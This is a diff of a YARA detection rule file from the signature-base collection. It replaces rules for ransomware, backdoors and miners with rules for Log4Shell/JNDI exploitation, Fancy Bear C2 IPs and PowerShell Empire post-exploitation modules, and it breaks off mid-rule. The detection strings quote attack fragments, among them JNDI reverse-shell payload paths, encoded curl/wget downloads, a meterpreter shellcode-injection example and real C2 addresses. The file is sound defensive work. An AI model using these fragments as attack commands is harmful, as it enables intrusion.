 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5c318c670b3aedf66da1c6444df7d630d2263e88527facfcf75d76dd974e7d31"
+		logic_hash = "703a83916c7279bcdc3cd61602472c2a3815140235be169f5b2063a547438c61"
 		score = 70
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "3a000b976c79585f62f40f7999ef9bdd326a9513"
-		hash1 = "3a000b976c79585f62f40f7999ef9bdd326a9513"
-		hash2 = "3a000b976c79585f62f40f7999ef9bdd326a9513"
+		tags = "CVE-2021-44228"
 
 	strings:
-		$s1 = "upfile.asp " fullword ascii
-		$s2 = "[wscript.shell]" fullword ascii
-		$s3 = "XP_CMDSHELL" fullword ascii
-		$s4 = "[XP_CMDSHELL]" fullword ascii
-		$s5 = "http://d99net.3322.org" fullword ascii
+		$sa1 = "Y3VybCAtcy"
+		$sa2 = "N1cmwgLXMg"
+		$sa3 = "jdXJsIC1zI"
+		$sb1 = "fHdnZXQgLXEgLU8tI"
+		$sb2 = "x3Z2V0IC1xIC1PLS"
+		$sb3 = "8d2dldCAtcSAtTy0g"
+		$fp1 = "<html"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 10000KB and 4 of them
+		1 of ( $sa* ) and 1 of ( $sb* ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_MAL_RANSOM_Darkbit_Feb23_1 : FILE
+rule SIGNATURE_BASE_SUSP_Jdniexploit_Indicators_Dec21 : FILE
 {
 	meta:
-		description = "Detects indicators found in DarkBit ransomware"
-		author = "Florian Roth"
-		id = "d209a0c2-f649-5fb1-9ecd-f1c35caa796f"
-		date = "2023-02-13"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/idonaor1/status/1624703255770005506?s=12&t=mxHaauzwR6YOj5Px8cIeIw"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ransom_darkbit_feb23.yar#L2-L23"
+		description = "Detects indicators of JDNI usage in log files and other payloads"
+		author = "Florian Roth (Nextron Systems)"
+		id = "2df8b8f3-8d8d-5982-8c85-692b7d91ebb2"
+		date = "2021-12-10"
+		modified = "2021-12-12"
+		reference = "https://github.com/flypig5211/JNDIExploit"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_log4j_cve_2021_44228.yar#L167-L180"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ba1baea7cb7362160c4b00b0355000a789b238c1ec82b840479c04028e6ca3ab"
-		score = 75
+		logic_hash = "7886a67672001f0db72575d96d3a12341bfcdc49a9951e3d5e2a88ab46bf5a5d"
+		score = 70
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$s1 = ".onion" ascii
-		$s2 = "GetMOTWHostUrl"
-		$x1 = "hus31m7c7ad.onion"
-		$x2 = "iw6v2p3cruy"
-		$xn1 = "You will receive decrypting key after the payment."
+		$xr1 = /(ldap|ldaps|rmi|dns|iiop|http|nis|nds|corba):\/\/[a-zA-Z0-9\.]{7,80}:[0-9]{2,5}\/(Basic\/Command\/Base64|Basic\/ReverseShell|Basic\/TomcatMemshell|Basic\/JBossMemshell|Basic\/WebsphereMemshell|Basic\/SpringMemshell|Basic\/Command|Deserialization\/CommonsCollectionsK|Deserialization\/CommonsBeanutils|Deserialization\/Jre8u20\/TomcatMemshell|Deserialization\/CVE_2020_2555\/WeblogicMemshell|TomcatBypass|GroovyBypass|WebsphereBypass)\//
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 10MB and ( 1 of ( $x* ) or 2 of them ) or 4 of them or ( filesize < 10MB and $xn1 )
+		filesize < 100MB and $xr1
 }
-rule SIGNATURE_BASE_MAL_RANSOM_Darkbit_Feb23_2 : FILE
+rule SIGNATURE_BASE_SUSP_EXPL_OBFUSC_Dec21_1 : CVE_2021_44228 FILE
 {
 	meta:
-		description = "Detects Go based DarkBit ransomware (garbled code; could trigger on other obfuscated samples, too)"
-		author = "Florian Roth"
-		id = "f530815c-68e7-55f1-8e36-bc74a1059584"
-		date = "2023-02-13"
-		modified = "2023-12-05"
-		reference = "https://www.hybrid-analysis.com/sample/9107be160f7b639d68fe3670de58ed254d81de6aec9a41ad58d91aa814a247ff?environmentId=160"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ransom_darkbit_feb23.yar#L25-L45"
+		description = "Detects obfuscation methods used to evade detection in log4j exploitation attempt of CVE-2021-44228"
+		author = "Florian Roth (Nextron Systems)"
+		id = "b8f56711-7922-54b9-9ce2-6ba05d64c80d"
+		date = "2021-12-11"
+		modified = "2022-11-08"
+		reference = "https://twitter.com/testanull/status/1469549425521348609"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_log4j_cve_2021_44228.yar#L182-L211"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "577435536300902811612a3415e82420574c98345b91b21fb2bfd2bfde396bec"
-		score = 75
+		logic_hash = "d6ffb70da82fe16e7a76feb31c01aa3e0cfc5625cc0e2b237ec851c646550839"
+		score = 60
 		quality = 85
-		tags = "FILE"
-		hash1 = "9107be160f7b639d68fe3670de58ed254d81de6aec9a41ad58d91aa814a247ff"
+		tags = "CVE-2021-44228, FILE"
 
 	strings:
-		$s1 = "runtime.initLongPathSupport" ascii fullword
-		$s2 = "reflect." ascii
-		$s3 = "    \"processes\": []," ascii fullword
-		$s4 = "^!* %!(!" ascii fullword
-		$op1 = { 4d 8b b6 00 00 00 00 48 8b 94 24 40 05 00 00 31 c0 87 82 30 03 00 00 b8 01 00 00 00 f0 0f c1 82 00 03 00 00 48 8b 44 24 48 48 8b 0d ba 1f 32 00 }
-		$op2 = { 49 8d 49 01 0f 1f 00 48 39 d9 7c e2 b9 0b 00 00 00 49 89 d8 e9 28 fc ff ff e8 89 6c d7 ff }
+		$f1 = { 24 7B 6C 6F 77 65 72 3A ?? 7D }
+		$f2 = { 24 7B 75 70 70 65 72 3A ?? 7D }
+		$x3 = "$%7blower:"
+		$x4 = "$%7bupper:"
+		$x5 = "%24%7bjndi:"
+		$x6 = "$%7Blower:"
+		$x7 = "$%7Bupper:"
+		$x8 = "%24%7Bjndi:"
+		$fp1 = "<html"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 20000KB and all of them
+		(1 of ( $x* ) or filesize < 200KB and 1 of ( $f* ) ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_Powershell_Case_Anomaly : FILE
+rule SIGNATURE_BASE_SUSP_Jdniexploit_Error_Indicators_Dec21_1
 {
 	meta:
-		description = "Detects obfuscated PowerShell hacktools"
+		description = "Detects error messages related to JDNI usage in log files that can indicate a Log4Shell / Log4j exploitation"
 		author = "Florian Roth (Nextron Systems)"
-		id = "41c97d15-c167-5bdd-a8b4-871d14f66fe1"
-		date = "2017-08-11"
-		modified = "2022-06-12"
-		reference = "https://twitter.com/danielhbohannon/status/905096106924761088"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_case_anomalies.yar#L11-L60"
+		id = "68bcf043-58b4-54a9-b024-64871b5d535f"
+		date = "2021-12-10"
+		modified = "2023-06-23"
+		reference = "https://twitter.com/marcioalm/status/1470361495405875200?s=20"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_log4j_cve_2021_44228.yar#L213-L226"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "cbef94b899a2d22930ee0e8b3eac03c505db629d19a62ddd8f56482403dfa595"
+		logic_hash = "2ab98814b2ed66b0bda875fecc0b09db82035d7edcdb0af65f815817ec8c6cc8"
 		score = 70
-		quality = 77
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		quality = 85
+		tags = ""
 
 	strings:
-		$s1 = "powershell" nocase ascii wide
-		$sn1 = "powershell" ascii wide
-		$sn2 = "Powershell" ascii wide
-		$sn3 = "PowerShell" ascii wide
-		$sn4 = "POWERSHELL" ascii wide
-		$sn5 = "powerShell" ascii wide
-		$sn6 = "PowerShelL" ascii wide
-		$sn7 = "PowershelL" ascii wide
-		$a1 = "wershell -e " nocase wide ascii
-		$an1 = "wershell -e " wide ascii
-		$an2 = "werShell -e " wide ascii
-		$k1 = "-noprofile" fullword nocase ascii wide
-		$kn1 = "-noprofile" ascii wide
-		$kn2 = "-NoProfile" ascii wide
-		$kn3 = "-noProfile" ascii wide
-		$kn4 = "-NOPROFILE" ascii wide
-		$kn5 = "-Noprofile" ascii wide
-		$fp1 = "Microsoft Code Signing" ascii fullword
-		$fp2 = "Microsoft Corporation" ascii
-		$fp3 = "Microsoft.Azure.Commands.ContainerInstance" wide
-		$fp4 = "# Localized PSGet.Resource.psd1" wide
+		$x1 = "FATAL log4j - Message: BadAttributeValueException: "
 
 	condition:
-		filesize < 800KB and ( ( #s1 > #sn1 + #sn2 + #sn3 + #sn4 + #sn5 + #sn6 + #sn7 ) or ( #a1 > #an1 + #an2 ) or ( #k1 > #kn1 + #kn2 + #kn3 + #kn4 + #kn5 ) ) and not 1 of ( $fp* )
+		1 of them
 }
-rule SIGNATURE_BASE_Wscriptshell_Case_Anomaly : FILE
+rule SIGNATURE_BASE_COZY_FANCY_BEAR_Hunt : FILE
 {
 	meta:
-		description = "Detects obfuscated wscript.shell commands"
+		description = "Detects Cozy Bear / Fancy Bear C2 Server IPs"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d69d932d-1e39-5259-9200-f0227754f49c"
-		date = "2017-09-11"
-		modified = "2022-06-09"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_case_anomalies.yar#L62-L84"
+		id = "e81b4368-7383-5a48-a89a-f91b9306326e"
+		date = "2016-06-14"
+		modified = "2023-12-05"
+		reference = "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fancybear_dnc.yar#L10-L28"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5c64e124186ae2eb974639627287fb27fe27eb2855342703e4a27a9c0fd62a91"
-		score = 60
-		quality = 83
+		logic_hash = "9009f181eeecce0ae322ba24335426399cf4484dfc9b7ea6905fb163b4bf0a25"
+		score = 75
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "WScript.Shell\").Run" nocase ascii wide
-		$sn1 = "WScript.Shell\").Run" ascii wide
-		$sn2 = "wscript.shell\").run" ascii wide
-		$sn3 = "WSCRIPT.SHELL\").RUN" ascii wide
-		$sn4 = "Wscript.Shell\").Run" ascii wide
-		$sn5 = "WScript.shell\").Run" ascii wide
+		$s1 = "185.100.84.134" ascii wide fullword
+		$s2 = "58.49.58.58" ascii wide fullword
+		$s3 = "218.1.98.203" ascii wide fullword
+		$s4 = "187.33.33.8" ascii wide fullword
+		$s5 = "185.86.148.227" ascii wide fullword
+		$s6 = "45.32.129.185" ascii wide fullword
+		$s7 = "23.227.196.217" ascii wide fullword
 
 	condition:
-		filesize < 3000KB and #s1 > #sn1 + #sn2 + #sn3 + #sn4 + #sn5
+		uint16( 0 ) == 0x5a4d and 1 of them
 }
-
-rule SIGNATURE_BASE_Oilrig_Rgdoor_Gen1 : FILE
+rule SIGNATURE_BASE_COZY_FANCY_BEAR_Pagemgr_Hunt : FILE
 {
 	meta:
-		description = "Detects RGDoor backdoor used by OilRig group"
+		description = "Detects a pagemgr.exe as mentioned in the CrowdStrike report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "68ac1f35-4eaa-5899-b66c-296d7c5fa462"
-		date = "2018-01-27"
+		id = "3c5c8843-81ba-510c-82ed-4b6e2286bdb2"
+		date = "2016-06-14"
 		modified = "2023-12-05"
-		reference = "https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_oilrig_rgdoor.yar#L13-L39"
+		reference = "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fancybear_dnc.yar#L30-L42"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "896900f788337327d444495ba0cd4c7c327bb4f9166bc2a981a348cf2c34cbdb"
-		score = 80
+		logic_hash = "c6055b7cd04b994c80395276e83bec664b7dd32f8093411bfde0850cca39e9f7"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a9c92b29ee05c1522715c7a2f9c543740b60e36373cb47b5620b1f3d8ad96bfa"
 
 	strings:
-		$c1 = { 00 63 6D 64 24 00 00 00 00 72 00 00 00 00 00 00 00 75 70 6C 6F
-              61 64 24 }
-		$c2 = { 63 61 6E 27 74 20 6F 70 65 6E 20 66 69 6C 65 3A 20 00 00 00 00
-              00 00 00 64 6F 77 6E 6C 6F 61 64 24 }
-		$s1 = "MyNativeModule.dll" fullword ascii
-		$s2 = "RGSESSIONID=" fullword ascii
-		$s3 = "download$" fullword ascii
-		$s4 = ".?AVCHelloWorld@@" fullword ascii
+		$s1 = "pagemgr.exe" wide fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 600KB and ( pe.imphash ( ) == "47cb127aad6c7c9954058e61a2a6429a" or 1 of ( $c* ) or 2 of them )
+		uint16( 0 ) == 0x5a4d and 1 of them
 }
-rule SIGNATURE_BASE_Uboatrat : FILE
+rule SIGNATURE_BASE_Empire_Invoke_Bypassuac : FILE
 {
 	meta:
-		description = "Detects UBoat RAT Samples"
+		description = "Empire - a pure PowerShell post-exploitation agent - file Invoke-BypassUAC.ps1"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f7f745c2-648d-5937-8d06-f5d1b6ed7e11"
-		date = "2017-11-29"
+		id = "8454d929-e184-5be1-b61f-4dfa8f44bdda"
+		date = "2015-08-06"
 		modified = "2023-12-05"
-		reference = "https://researchcenter.paloaltonetworks.com/2017/11/unit42-uboatrat-navigates-east-asia/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_uboat_rat.yar#L9-L50"
+		reference = "https://github.com/PowerShellEmpire/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powershell_empire.yar#L9-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3d0837607d1a5efd9986eccf98f108633502a09dbf8c4c94fc0f0247060bc3a8"
-		score = 75
-		quality = 83
+		hash = "ab0f900a6915b7497313977871a64c3658f3e6f73f11b03d2d33ca61305dc6a8"
+		logic_hash = "1697065405fa0e255cdd77fa39f53866118caf0bad6a3d72756590303610e7b6"
+		score = 70
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "04873dbd63279228a0a4bb1184933b64adb880e874bd3d14078161d06e232c9b"
-		hash2 = "7b32f401e2ad577e8398b2975ecb5c5ce68c5b07717b1e0d762f90a6fbd8add1"
-		hash3 = "42d8a84cd49ff3afacf3d549fbab1fa80d5eda0c8625938b6d32e18004b0edac"
-		hash4 = "6bea49e4260f083ed6b73e100550ecd22300806071f4a6326e0544272a84526c"
-		hash5 = "cf832f32b8d27cf9911031910621c21bd3c20e71cc062716923304dacf4dadb7"
-		hash6 = "bf7c6e911f14a1f8679c9b0c2b183d74d5accd559e17297adcd173d76755e271"
 
 	strings:
-		$s1 = "URLDownloadToFileA" ascii
-		$s2 = "GetModuleFileNameW" ascii
-		$s4 = "WININET.dll" ascii
-		$s5 = "urlmon.dll" ascii
-		$s6 = "WTSAPI32.dll" ascii
-		$s7 = "IPHLPAPI.DLL" ascii
-		$op1 = { 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68
-               69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F
-               74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20
-               6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 }
-		$vprotect = { 2E 76 6D 70 30 }
+		$s1 = "$WriteProcessMemoryAddr = Get-ProcAddress kernel32.dll WriteProcessMemory" fullword ascii
+		$s2 = "$proc = Start-Process -WindowStyle Hidden notepad.exe -PassThru" fullword ascii
+		$s3 = "$Payload = Invoke-PatchDll -DllBytes $Payload -FindString \"ExitThread\" -ReplaceString \"ExitProcess\"" fullword ascii
+		$s4 = "$temp = [System.Text.Encoding]::UNICODE.GetBytes($szTempDllPath)" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and uint32( uint32( 0x3c ) ) == 0x4550 and filesize < 1400KB and filesize > 800KB and ( all of ( $s* ) and $op1 at 64 and uint16( uint32( 0x3c ) + 11 ) == 0x59 and $vprotect in ( 600 .. 700 ) )
+		filesize < 1200KB and 3 of them
 }
-rule SIGNATURE_BASE_Uboatrat_Dropper : FILE
+rule SIGNATURE_BASE_Empire_Lib_Modules_Trollsploit_Message : FILE
 {
 	meta:
-		description = "Detects UBoatRAT Dropper"
+		description = "Empire - a pure PowerShell post-exploitation agent - file message.py"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f3d4e333-1282-5f6e-9294-628a8230d2a5"
-		date = "2017-11-29"
+		id = "cb0eee5a-c236-512e-8256-7411a7fb1fd5"
+		date = "2015-08-06"
 		modified = "2023-12-05"
-		reference = "https://researchcenter.paloaltonetworks.com/2017/11/unit42-uboatrat-navigates-east-asia/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_uboat_rat.yar#L52-L69"
+		reference = "https://github.com/PowerShellEmpire/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powershell_empire.yar#L28-L45"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6f8dcc8559fa0ab1644ef6bab9bc875f3d62391c157b373e0355ad03d35e5601"
-		score = 75
+		hash = "71f2258177eb16eafabb110a9333faab30edacf67cb019d5eab3c12d095655d5"
+		logic_hash = "70b7d91395ae30131c1448511425abf32ddedf04632266454aa008330ff28222"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "f4c659238ffab95e87894d2c556f887774dce2431e8cb87f881df4e4d26253a3"
 
 	strings:
-		$s1 = "GetCurrenvackageId" fullword ascii
-		$s2 = "fghijklmnopq" fullword ascii
-		$s3 = "23456789:;<=>?@ABCDEFGHIJKLMNOPQ" fullword ascii
-		$s4 = "PMM/dd/y" fullword ascii
-		$s5 = "bad all" fullword ascii
+		$s1 = "script += \" -\" + str(option) + \" \\\"\" + str(values['Value'].strip(\"\\\"\")) + \"\\\"\"" fullword ascii
+		$s2 = "if option.lower() != \"agent\" and option.lower() != \"computername\":" fullword ascii
+		$s3 = "[String] $Title = 'ERROR - 0xA801B720'" fullword ascii
+		$s4 = "'Value'         :   'Lost contact with the Domain Controller.'" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
+		filesize < 10KB and 3 of them
 }
-rule SIGNATURE_BASE_SUSP_LNX_SH_Cryptominer_Indicators_Dec20_1 : FILE
+rule SIGNATURE_BASE_Empire_Persistence : FILE
 {
 	meta:
-		description = "Detects helper script used in a crypto miner campaign"
+		description = "Empire - a pure PowerShell post-exploitation agent - file Persistence.psm1"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e376e0e1-1490-5ad4-8ca2-d28ca1c0b51a"
-		date = "2020-12-31"
+		id = "0f63b5f4-f933-5821-b0b0-50717e75f6d9"
+		date = "2015-08-06"
 		modified = "2023-12-05"
-		reference = "https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_crypto_miner.yar#L2-L17"
+		reference = "https://github.com/PowerShellEmpire/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powershell_empire.yar#L47-L63"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4acd1b77307dbf23f95f7a2024209bee714c6931182aff16455ea6b7e4a6f287"
-		score = 65
+		hash = "ae8875f7fcb8b4de5cf9721a9f5a9f7782f7c436c86422060ecdc5181e31092f"
+		logic_hash = "3c398aa180b6f2225a25f9b1430e89991c7e391930e2be140e89c67da67b3614"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		hash1 = "3298dbd985c341d57e3219e80839ec5028585d0b0a737c994363443f4439d7a5"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "miner running" fullword ascii
-		$x2 = "miner runing" fullword ascii
-		$x3 = " --donate-level 1 "
-		$x4 = " -o pool.minexmr.com:5555 " ascii
+		$s1 = "C:\\PS>Add-Persistence -ScriptBlock $RickRoll -ElevatedPersistenceOption $ElevatedOptions -UserPersistenceOption $UserOptions -V" ascii
+		$s2 = "# Execute the following to remove the user-level persistent payload" fullword ascii
+		$s3 = "$PersistantScript = $PersistantScript.ToString().Replace('EXECUTEFUNCTION', \"$PersistenceScriptName -Persist\")" fullword ascii
 
 	condition:
-		filesize < 20KB and 1 of them
+		filesize < 108KB and 1 of them
 }
-rule SIGNATURE_BASE_PUA_WIN_XMRIG_Cryptocoin_Miner_Dec20 : FILE
+rule SIGNATURE_BASE_Empire_Portscan : FILE
 {
 	meta:
-		description = "Detects XMRIG crypto coin miners"
+		description = "Empire - a pure PowerShell post-exploitation agent - file portscan.py"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4dfb04e9-fbba-5a6f-ad20-d805025d2d74"
-		date = "2020-12-31"
+		id = "23a0f769-9155-5aa0-9200-2baf827bdda4"
+		date = "2015-08-06"
 		modified = "2023-12-05"
-		reference = "https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_crypto_miner.yar#L19-L33"
+		reference = "https://github.com/PowerShellEmpire/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powershell_empire.yar#L65-L80"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c39aee669a98bcc9d07821aef248096e45a6c54ab22b8b98c0a393b445f3934e"
-		score = 75
+		hash = "b355efa1e7b3681b1402e22c58ce968795ef245fd08a0afb948d45c173e60b97"
+		logic_hash = "162ac4ccc8629a2d017831cdc6d1bf8d7a62b844bf68a0d61956b2f41a5e004b"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		hash1 = "b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "xmrig.exe" fullword wide
-		$x2 = "xmrig.com" fullword wide
-		$x3 = "* for x86, CRYPTOGAMS" fullword ascii
+		$s1 = "script += \"Invoke-PortScan -noProgressMeter -f\"" fullword ascii
+		$s2 = "script += \" | ? {$_.alive}| Select-Object HostName,@{name='OpenPorts';expression={$_.openPorts -join ','}} | ft -wrap | Out-Str" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 6000KB and 2 of them or all of them
+		filesize < 14KB and all of them
 }
-rule SIGNATURE_BASE_MAL_ELF_Reverseshell_Sslshell_Jun23_1 : CVE_2023_2868 FILE
+rule SIGNATURE_BASE_Empire_Invoke_Shellcode : FILE
 {
 	meta:
-		description = "Detects reverse shell named SSLShell used in Barracuda ESG exploitation (CVE-2023-2868)"
-		author = "Florian Roth"
-		id = "91b34eb7-61d2-592e-a444-249da43994ca"
-		date = "2023-06-07"
+		description = "Empire - a pure PowerShell post-exploitation agent - file Invoke-Shellcode.ps1"
+		author = "Florian Roth (Nextron Systems)"
+		id = "41788f71-cc99-50b3-bdc7-17b132ab2767"
+		date = "2015-08-06"
 		modified = "2023-12-05"
-		reference = "https://www.barracuda.com/company/legal/esg-vulnerability"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_lnx_barracuda_cve_2023_2868.yar#L2-L19"
+		reference = "https://github.com/PowerShellEmpire/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powershell_empire.yar#L82-L98"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "57e9afb2f6928656242b8257cc3b98ae3b03e38c75ad40b544e3fc6afaea794d"
-		score = 75
+		hash = "fa75cfd57269fbe3ad6bdc545ee57eb19335b0048629c93f1dc1fe1059f60438"
+		logic_hash = "968a140f75aa17bd9aac243483cade931dc047854b65b2f61146492c2cf01ea5"
+		score = 70
 		quality = 85
-		tags = "CVE-2023-2868, FILE"
-		hash1 = "8849a3273e0362c45b4928375d196714224ec22cb1d2df5d029bf57349860347"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$sc1 = { 00 2D 63 00 2F 62 69 6E 2F 73 68 00 }
-		$s1 = "SSLShell"
+		$s1 = "C:\\PS> Invoke-Shellcode -ProcessId $Proc.Id -Payload windows/meterpreter/reverse_https -Lhost 192.168.30.129 -Lport 443 -Verbos" ascii
+		$s2 = "\"Injecting shellcode injecting into $((Get-Process -Id $ProcessId).ProcessName) ($ProcessId)!\" ) )" fullword ascii
+		$s3 = "$RemoteMemAddr = $VirtualAllocEx.Invoke($hProcess, [IntPtr]::Zero, $Shellcode.Length + 1, 0x3000, 0x40) # (Reserve|Commit, RWX)" fullword ascii
 
 	condition:
-		uint32be( 0 ) == 0x7f454c46 and uint16( 0x10 ) == 0x0002 and filesize < 5MB and all of them
+		filesize < 100KB and 1 of them
 }
-rule SIGNATURE_BASE_MAL_ELF_SALTWATER_Jun23_1 : CVE_2023_2868 FILE
+rule SIGNATURE_BASE_Empire_Invoke_Mimikatz : FILE
 {
 	meta:
-		description = "Detects SALTWATER malware used in Barracuda ESG exploitations (CVE-2023-2868)"
-		author = "Florian Roth"
-		id = "10a038f6-6096-5d3a-aaf5-db441685102b"
-		date = "2023-06-07"
+		description = "Empire - a pure PowerShell post-exploitation agent - file Invoke-Mimikatz.ps1"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f7d6c1c4-2a24-54fd-b745-32d7894affc8"
+		date = "2015-08-06"
 		modified = "2023-12-05"
-		reference = "https://www.barracuda.com/company/legal/esg-vulnerability"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_lnx_barracuda_cve_2023_2868.yar#L21-L46"
+		reference = "https://github.com/PowerShellEmpire/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powershell_empire.yar#L100-L116"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "cb35898c0ee726170da93b4364920ac065f083f9f02db8eb5d293b1ce127cb78"
-		score = 80
+		hash = "c5481864b757837ecbc75997fa24978ffde3672b8a144a55478ba9a864a19466"
+		logic_hash = "3e16bed3dd7b36920cdf01507f35e38d004e3ce2f3301911a8ee4aedbae6c5c3"
+		score = 70
 		quality = 85
-		tags = "CVE-2023-2868, FILE"
-		hash1 = "601f44cc102ae5a113c0b5fe5d18350db8a24d780c0ff289880cc45de28e2b80"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "libbindshell.so"
-		$s1 = "ShellChannel"
-		$s2 = "MyWriteAll"
-		$s3 = "CheckRemoteIp"
-		$s4 = "run_cmd"
-		$s5 = "DownloadByProxyChannel"
-		$s6 = "[-] error: popen failed"
-		$s7 = "/home/product/code/config/ssl_engine_cert.pem"
